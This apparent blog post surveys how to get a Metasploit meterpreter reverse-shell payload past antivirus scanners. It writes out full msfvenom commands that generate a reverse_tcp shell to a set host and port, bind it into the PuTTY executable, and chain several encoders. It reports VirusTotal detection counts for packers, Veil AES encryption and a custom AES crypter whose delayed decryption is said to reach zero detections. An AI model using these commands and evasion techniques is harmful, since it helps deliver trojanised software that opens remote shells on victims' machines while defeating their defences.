A Quick Survey on Anti-Anti-Viruses

March 16, 2018
c++ malware

tl;dr

AVs can easily be bypassed using malware AES crypters like Crypt0r:

AES Parameters

Open Source Evasion Techniques

All of the following results are based on a meterpreter file which was generated like this:

msfvenom
  -p windows/meterpreter/reverse_tcp
  --platform windows
  -f exe
  LHOST=192.168.1.1
  LPORT=1337
  -o meter.exe

All scans are performed on VirusTotal. Please not that this covers static analysis only. However, it will become clear later on that dynamic analysis of the used techniques aren’t required at all.

Packers

Packers compress malware and decompress it at runtime using an embedded decompression stub. Using the packer UPX seems to be suspicious as the detection rates increase by using a packer:

Without Packer 3956
With Packer 4156

Binder

This technique basically combines two executables, a malicious and an ordinary one, into one file. The malicious code will be executed in a separate thread upon startup. This command was used to generate a meterpreter shell in combination with the SSH client PuTTY:

msfvenom
  -p windows/meterpreter/reverse_tcp
  --platform windows
  -x putty.exe
  -k
  -f exe
  LHOST=192.168.1.1
  LPORT=1337
  -f exe
  -o meter.exe

A slight decrease of detections can be seen:

Without Binder 3956
With Binder 3356

Encoders

Using Encoders, the malicious payload will be obscured. There are many different approaches for this, however the polymorphic encoder shikata_ga_nai is one of the most widely used ones. When executing a encoded malware file, the entry point of the decoding method will be called. The payload will then be decoded and executed.

The results are the following:

No Encoder 3956
XOR 3356
powershell_x86 3356
shikata_ga_nai 3356

No change in detection rates - let’s combine multiple encoders and the binding technique:

msfvenom -p windows/meterpreter/reverse_tcp
  LHOST=192.168.1.1
  LPORT 1337
  -f raw
  -e x86/context_time
  -i 1
  --platform windows |

msfvenom -a x86
  --platform windows
  -e x86/countdown
  -i 7
  -f raw |

msfvenom -a x86
  --platform windows
  -e x86/context_cpuid
  -i 1
  -f raw |

msfvenom -a x86
  --platform windows
  -e x86/shikata_ga_nai
  -i 2
  -x putty.exe
  -k
  -f exe
  -o meter.exe

This yields 3056 - better but still not zero.

Using Veil

Using Veil, hiding payloads becomes quite easy using a built-in assistant. Using python/shellcode_inject/aes_encrypt in combination with Pyherion and a shellcode for windows/meterpreter/reverse_tcp decreases the detection rate down to 1956.

Crypters

Crypters encrypt the malicious shellcode using a secure encryption algorithm. To execute the payload at runtime, the so called stub brute forces the built-in encrypted shellcode in order to invoke it. Using AES-128 and a delayed decryption, it was possible to decrease the detection down to zero for both scantime and runtime. The runtime detection bypass basically delays the start of the decryption routine by performing unnecessary actions like:

In my tests, wasting about 30 seconds was enough to “shake off” the AV runtime check.

You can check out the source code here.

Coding A CS:GO Hack

June 19, 2019
reverse-engineering c++ binary

Creating A Multiplayer Game Hack

August 28, 2018
c++ binary hooking reverse-engineering

Runtime Function Patching

August 16, 2018
c++ binary cracking reverse-engineering